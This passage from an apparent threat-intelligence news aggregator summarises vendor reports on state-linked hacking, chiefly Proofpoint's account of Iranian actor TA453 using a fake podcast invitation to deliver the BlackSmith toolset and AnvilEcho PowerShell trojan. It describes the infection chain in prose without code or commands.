subsequently sent to the attackers.
The suspected counterintelligence operations started as early as 2017 and lasted at least until March 2024. In the past, similar campaigns were deployed in Arabic, targeting individuals affiliated with Syria and Hezbollah intelligence and security agencies. This may indicate Iran's counterintelligence activities extend beyond its own security and intelligence apparatus, possibly in support of its allies in Syria and Lebanon. Mandiant worked to help ensure this activity was blocked and disrupted, the threat actor's accounts were terminated, and Google Chrome users and the users of other browsers were protected.
Threat Mobile Cloud APT 42 ★★★★
DarkReading.webp 2024-08-26 21:33:17
Hackers Use Rare Stealth Techniques to Down Asian Military, Gov't Orgs
A threat actor resembling APT41 performed "AppDomainManager Injection," which is like DLL sideloading, but arguably easier and stealthier.
Threat APT 41 ★★
ProofPoint.webp 2024-08-20 05:00:25
Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset
Key findings
- Proofpoint identified Iranian threat actor TA453 targeting a prominent religious figure with a fake podcast interview invitation.
- The initial interaction attempted to lure the target to engage with a benign email to build conversation and trust to then subsequently click on a follow-up malicious link.
- The attack chain attempted to deliver a new malware toolkit called BlackSmith, which delivered a PowerShell trojan dubbed AnvilEcho by Proofpoint.
- The malware, which uses encryption and network communication techniques similar to previously observed TA453 samples, is designed to enable intelligence gathering and exfiltration.
- AnvilEcho contains all of TA453's previously identified malware capabilities in a single PowerShell script rather than the modular approach previously observed.
Overview
Starting 22 July 2024, TA453 contacted multiple email addresses for a prominent Jewish figure while pretending to be the Research Director for the Institute for the Study of War (ISW). The lure purported to invite the target to be a guest on a podcast hosted by ISW. After receiving a response from the target (outside of Proofpoint visibility), TA453 replied with a DocSend URL. The DocSend URL was password protected and led to a text file that contained a URL to the legitimate ISW Podcast being impersonated by TA453. It is likely that TA453 was attempting to normalize the target clicking a link and entering a password so the target would do the same when they delivered malware.
Initial July 2024 approach from TA453.
DocSend contents containing the podcast themed text.
Proofpoint first observed TA453 spoofing the Institute for the Study of War (ISW) in phishing campaigns targeting other organizations starting in February 2024, almost immediately after registering the domain in late January 2024. The theme of spoofing is consistent with broader TA453 phishing activity reported by Google Threat Intelligence Group in August 2024.
TA453 initially sent the fake podcast invitation to the religious figure at multiple email accounts, specifically both the target's organizational email address along with their personal email address. Phishing multiple email addresses associated with a target has been observed by a number of state aligned threats, including TA427. TA453 continued to establish their legitimacy by sending emails from understandingthewar[.]org and including a TA453 controlled Hotmail account in the email signature.
After another reply from the target, TA453 replied with a GoogleDrive URL leading to a ZIP archive named “Podcast Plan-2024.zip”. The ZIP contained an LNK titled “Podcast Plan 2024.lnk”. The LNK delivered the BlackSmith toolset which eventually loaded TA453's AnvilEcho PowerShell Trojan.
Fake podcast invitation containing a malicious URL.
Malware analysis
Old habits die screaming, and TA453 sticks to its habits. Our analysis of the malware from this TA453 campaign demonstrates the developers working for TA453 have not given up on using modular PowerShell backdoors. They continue to attempt to evade detections by convoluting the infection chain in order to limit and avoid detection opportunities while collecting intelligence. The toolset observed in this infection chain is likely the successor of GorjolEcho/PowerStar, TAMECURL, MischiefTut, and CharmPower. The first TA453 backdoor was detected by Proofpoint in Fall 2021. Rather than deploy each PowerShell module separately, TA453 attempts to bundle the entire framework into a single large PowerShell script dubbed AnvilEcho by Proofpoint.
Timeline of TA453 malware.
Infection chain
The LNK is used to smuggle additional files. It hides behind a decoy PDF as an overlay and extracts the contents of the ZIP folder to %TEMP%. The ZIP folder contains Beautifull.jpg, mary.dll, qemus (the encrypted AnvilEcho PowerShell script), soshi.dll, and toni.dll. A PDB path of E:\FinalS
Malware Threat Studies APT 35 APT 42 ★★★
Last update at: 2025-05-10 18:53:10